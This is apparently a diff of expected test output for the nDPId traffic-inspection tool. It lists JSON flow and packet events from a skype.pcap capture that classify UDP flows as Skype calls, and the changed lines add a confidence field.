+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.168","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.32","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.141","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.41","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.157","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.175","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.143","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00692{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00692{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00692{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00692{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2921,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969770694,"flow_last_seen":1431969770694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969770694,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50135,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2921,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1431969770694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969770694,"pkt":"0NQSxnP1PBXCt3IOCABFAABArS9AAEAG3hDAqAEiTKehBsPXTzInl3a\/AAAAALAC\/\/8aLgAAAgQFtAEDAwUBAQgKPiR90gAAAAAEAgAA"}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2922,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969770694,"flow_last_seen":1431969770694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969770694,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50136,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -1145,32 +1144,32 @@
 00575{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969675950,"flow_last_seen":1431969702405,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63108,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969675950,"flow_last_seen":1431969702405,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55159,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969677975,"flow_last_seen":1431969704363,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49360,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.141","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
